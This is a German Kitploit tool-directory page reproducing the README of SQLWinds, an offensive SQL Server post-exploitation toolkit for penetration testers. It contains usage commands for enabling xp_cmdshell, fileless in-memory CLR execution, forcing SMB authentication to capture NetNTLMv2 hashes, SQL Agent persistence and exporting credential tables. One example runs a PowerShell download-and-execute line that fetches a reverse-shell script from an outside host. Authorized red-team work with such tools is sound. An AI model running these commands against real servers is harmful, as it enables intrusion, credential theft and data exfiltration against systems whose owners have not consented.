Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
sqlwinds — SQLWinds - SQL Server-Sicherheitsbewertung & Post-Exploitation-Toolkit | Kitploit
Tools/GitHubGitHub/blue0x1/sqlwinds
Privilege EscalationPersistenzmechanismenExploitationLaterale BewegungKonfigurationsprüfungDatenexfiltrationPost-ExploitationPenetrationstestsRed TeamingDatenbanksicherheit
GitHubblue0x1/sqlwinds
vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

sqlwinds

SQLWinds - SQL Server-Sicherheitsbewertung & Post-Exploitation-Toolkit

Repository anzeigen

SQLWinds

Toolkit für SQL-Sicherheitsbewertung und Post-Exploitation

SQLWinds ist ein Befehlszeilentool für Sicherheitstests und die Ausnutzung von Microsoft SQL Server. Es bietet eine interaktive Umgebung, um Server eingehend zu analysieren, Privilegien zu erweitern, Angriffe auszuführen und sich durch Netzwerke zu bewegen – alles mit spezialisierten Befehlen für Aufgaben wie In-Memory-Codeausführung und SCCM-Datenbankerkundung.


SQLWinds


📖 Dokumentation & Ressourcen

Wiki Issues Releases

Schnellzugriff:

  • Vollständige Dokumentation & Wiki – Vollständige Anleitung und Befehlsreferenz
  • Problem melden – Einen Fehler gefunden oder eine Funktionsanfrage?
  • Neueste Version – Lade die neueste Version herunter

Funktionen

  • Verschiedene Authentifizierungsmethoden: Unterstützt SQL, Windows-integrierte Authentifizierung (--integrated) und Kerberos-Delegierung (--kerberos mit --user/--pass).
  • Umfassende Enumeration:
    • Serverinformationen, Datenbanken, Tabellen, Spalten, Benutzer und Berechtigungen.
    • Sicherheitskonfigurations-Audit (xp_cmdshell, CLR, OLE usw.).
    • Erkennung sensibler Daten und Extraktion von Geheimnissen.
    • Enumeration und Ausnutzung von Linked Servern.
  • Post-Exploitation & Lateral Movement:
    • Codeausführung: Aktivieren und Verwenden von xp_cmdshell, OLE-Automatisierungsprozeduren (sp_oacreate) und CLR-Integration.
    • In-Memory-CLR: .NET-Assemblys direkt aus dem Speicher laden und ausführen, ohne Dateien auf die Festplatte zu schreiben (:memclr).
    • Credential-Diebstahl: SMB-Authentifizierung gegen einen UNC-Pfad erzwingen für Relay-Angriffe (:unc_smb).
    • Registry-Interaktion: Registrierungsschlüssel und -werte über xp_regread lesen.
    • Persistenz: SQL-Agent-Aufträge erstellen, auflisten und ausführen.

Installation & Kompilierung

Schneller Build

Das Repository enthält ein build.bat-Skript für die einfache Kompilierung unter Windows:

root@kitploit:~
.\build.bat

Die kompilierte ausführbare Datei SQLWinds.exe wird im Verzeichnis bin\Release\ abgelegt.

Manueller Build

  1. Stellen Sie sicher, dass das .NET Framework (≥ 4.6.1) oder das .NET SDK installiert ist.
  2. Klonen Sie das Repository:
    root@kitploit:~
    git clone https://github.com/blue0x1/sqlwinds.git
    cd sqlwinds
    
  3. Kompilieren Sie die Projektmappe:
    root@kitploit:~
    msbuild SQLWinds.sln /p:Configuration=Release
    

Verwendung

Grundlegende Verbindung

root@kitploit:~
# SQL Authentication
SQLWinds.exe --server TARGET\\INSTANCE --user sa --pass Password123

# Windows Authentication (Current User Context)
SQLWinds.exe --server sql01.corp.local --integrated

# Kerberos Delegation (with provided credentials)
SQLWinds.exe --server sql01.prod.corp.local --kerberos --user CORP\\svc_sql --pass SvcPass123!

# Connect and run a single command
SQLWinds.exe --server 10.0.0.5 --user sa --pass pass --run-cmd "SELECT name FROM sys.databases"

Allgemeine Befehlszeilenoptionen

Interaktiver REPL-Modus

root@kitploit:~
sqlwinds> :info
sqlwinds> :dbs
sqlwinds> :users
sqlwinds> :enable_xp_cmdshell
sqlwinds> :xp whoami
sqlwinds> :spn
sqlwinds> help

Vollständige REPL-Befehlsreferenz

Beispiel: Verwendung von :plain für große Skripte

Der Befehl :plain ist unerlässlich für die Ausführung großer, mehrzeiliger SQL-Skripte.

root@kitploit:~
sqlwinds> :plain
SQL> 
SQL> BEGIN TRY
.....>     SELECT * FROM [VeryImportantTable];
.....>     EXEC sp_configure 'show advanced options', 1;
.....>     RECONFIGURE;
.....> END TRY
.....> BEGIN CATCH
.....>     SELECT ERROR_MESSAGE();
.....> END CATCH
.....> :execute
  1. Geben Sie :plain ein und drücken Sie die Eingabetaste.
  2. Fügen Sie Ihr vollständiges SQL-Skript ein oder geben Sie es ein.
  3. Geben Sie in einer neuen Zeile :execute ein, um das gesamte Skript auszuführen, oder :cancel, um abzubrechen.

Beispiele

1. Audit

root@kitploit:~
SQLWinds.exe --server dc01 --integrated --security-audit 

2. Nutzung von xp_cmdshell für die Codeausführung

root@kitploit:~
SQLWinds.exe --server 192.168.1.15 --user sa --pass pass --enable-xp-cmdshell
# In the REPL that opens:
sqlwinds> :xp whoami /all
sqlwinds> :xp powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.10/revshell.ps1')"

3. In-Memory-CLR-Ausführung (dateilos)

root@kitploit:~
# Compile your .NET assembly to a DLL (e.g., CommandExecutor.dll)
sqlwinds> :enable_clr
sqlwinds> :memclr "C:\Tools\CommandExecutor.dll" "CommandExecutor.Class1" "Exec" "whoami"

4. Stehlen von NetNTLMv2-Hashes über SRelay

root@kitploit:~
# On your machine: sudo responder -I tun0
sqlwinds> :unc_smb \\10.10.15.10\fake_share

5. Ausnutzung der SCCM-Datenbank

root@kitploit:~
SQLWinds.exe --server sccmdb.corp.local --integrated
sqlwinds> :sccm_info
sqlwinds> :sccm_collections
sqlwinds> :sccm_application "Microsoft 365"

6. Datenexfiltration

root@kitploit:~
# Export sensitive data to CSV
sqlwinds> :exportcsv "SELECT username, password FROM users" credentials.csv

# Download a file stored in the database
sqlwinds> :download "SELECT file_data FROM documents WHERE id=1" secret.docx

🤝 Mitwirken & Support

Wir freuen uns über Beiträge! Wenn Sie Ideen für Verbesserungen haben oder Probleme finden:

  1. Schauen Sie in die Wiki für die Dokumentation
  2. Durchsuchen Sie die vorhandenen Issues, um Duplikate zu vermeiden
  3. Erstellen Sie ein neues Issue mit detaillierten Informationen zu Ihrem Vorschlag oder Fehlerbericht

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke gedacht. Die nicht autorisierte Verwendung gegen Systeme, die Sie nicht besitzen oder für deren Test Sie keine ausdrückliche Genehmigung haben, ist illegal. Die Entwickler übernehmen keine Haftung und sind nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Programm verursacht werden.


Danksagungen

Entwickelt von blue0x1.

Tool herunterladen
  • Datenexfiltration: Dateien hoch-/herunterladen und Abfrageergebnisse als CSV/JSON exportieren.
  • SCCM-Datenbank-Interaktion: (Wenn die Zieldatenbank SCCM ist)
    • SCCM erkennen und Versions-/Standortinformationen melden.
    • Hardware, Software, Sammlungen (Collections) und Bereitstellungen inventarisieren.
    • SCCM-spezifische Sicherheitsaudits durchführen.
  • Kerberos-Analyse: Active Directory nach SPNs durchsuchen, die mit dem Ziel verknüpft sind, um Kerberos-Authentifizierungsprobleme zu beheben.
  • Instanzermittlung: SQL-Server-Instanzen in der Domäne aufzählen.
  • Erweiterte REPL: Interaktive Umgebung mit automatischer Vervollständigung und Befehlsverlauf.
  • OptionBeschreibung
    --serverZielserver (IP, Hostname, Instanz). Erforderlich.
    --user, --passAnmeldedaten für SQL- oder Windows-Authentifizierung.
    --integratedAktuelles Windows-Token für die Authentifizierung verwenden.
    --kerberosKerberos-Authentifizierungsablauf verwenden.
    --spn-checkAD nach SPNs für den Zielhost durchsuchen.
    --run-cmd "<SQL>"Ein einzelnes SQL-Kommando ausführen und beenden.
    --run-file file.sqlEin SQL-Skript aus einer Datei ausführen und beenden.
    --infoUmfangreiche Serverinformationen sammeln und anzeigen.
    --getinstanceSQL-Instanzen in der Domäne ermitteln und beenden.
    --list-dbsDatenbanken auflisten und beenden.
    --security-auditSicherheitsaudit durchführen und beenden.
    BefehlBeschreibungBeispiel
    :infoDetaillierte Serverinformationen anzeigen:info
    :dbsAlle Datenbanken mit Details auflisten:dbs
    :tables [db] [schema]Tabellen in Datenbank/Schema auflisten:tables master dbo
    :columns <table> [schema] [db]Spalten für eine Tabelle auflisten:columns Users dbo MyDatabase
    :usersAlle SQL-Anmeldungen und Datenbankbenutzer auflisten:users
    :permsAktuelle Benutzerberechtigungen anzeigen:perms
    :auditSicherheitskonfigurations-Audit durchführen:audit
    :search [term]Nach sensiblen Daten suchen:search password
    :secretsMögliche Geheimnisse extrahieren:secrets
    :servicesSQL-Server-Dienstkonten anzeigen:services
    :spnSPNs für den Zielhost prüfen:spn
    :enable_xp_cmdshellxp_cmdshell aktivieren:enable_xp_cmdshell
    :disable_xp_cmdshellxp_cmdshell deaktivieren:disable_xp_cmdshell
    :xp <command>Betriebssystembefehl über xp_cmdshell ausführen:xp whoami
    :enable_oleOLE-Automatisierung aktivieren:enable_ole
    :disable_oleOLE-Automatisierung deaktivieren:disable_ole
    :ole_cmd <command>Betriebssystembefehl über OLE ausführen:ole_cmd "calc.exe"
    :enable_clrCLR-Integration aktivieren:enable_clr
    :disable_clrCLR-Integration deaktivieren:disable_clr
    :deploy-clr <path>CLR-Assembly aus Datei bereitstellen:deploy-clr C:\Tools\cmd.dll
    :list-assembliesBereitgestellte CLR-Assemblys auflisten:list-assemblies
    :clr_execEine CLR-Methode ausführen:clr_exec MyAssembly MyClass Method arg1
    :memclrCLR-Assembly aus dem Speicher ausführen:memclr "C:\Tools\exec.dll" "Namespace.Class" "Method" "arg"
    :remove-assembly <name>Eine CLR-Assembly entfernen:remove-assembly MyAssembly
    :list_linkserversLinked Server auflisten:list_linkservers
    :linkrpc <srv> <cmd>Befehl über Linked Server ausführen:linkrpc LINKEDSRV "whoami"
    :impersonate <login>Eine SQL-Anmeldung impersonieren:impersonate sa
    :revertSicherheitskontext zurücksetzen:revert
    :agent_jobSQL-Agent-Aufträge verwalten:agent_job create MyJob "whoami"
    :ls [path]Verzeichnis über SQL auflisten:ls C:\Windows\Temp
    :unc_smb <path>SMB-Authentifizierung gegen UNC erzwingen:unc_smb \\192.168.1.100\share
    :plainGroße SQL-Skripte einfügen(Siehe Beispiel unten)
    :regreadRegistrierungswert lesen:regread HKEY_LOCAL_MACHINE Software\Microsoft value
    :regread_allAlle Werte in einem Schlüssel auflisten:regread_all HKEY_LOCAL_MACHINE Software\Microsoft
    :uploadDatei in Tabelle hochladen:upload C:\file.txt MyTable
    :downloadBinärdatei aus Abfrage herunterladen:download "SELECT file FROM blobs" out.bin
    :exportcsvAbfrage als CSV exportieren:exportcsv "SELECT * FROM users" out.csv
    :exportjsonAbfrage als JSON exportieren:exportjson "SELECT * FROM users" out.json
    :sccm_infoSCCM-Datenbank erkennen:sccm_info
    :sccm_inventorySCCM-Inventar anzeigen:sccm_inventory
    :sccm_collectionsSCCM-Sammlungen auflisten:sccm_collections "All Systems"
    :sccm_deploymentsBereitstellungen anzeigen:sccm_deployments
    :sccm_clientsClients auflisten:sccm_clients inactive
    :sccm_auditSCCM-Sicherheitsaudit:sccm_audit
    :sccm_applicationApp-Details anzeigen:sccm_application "Google Chrome"
    helpHilfe anzeigenhelp
    exitREPL beendenexit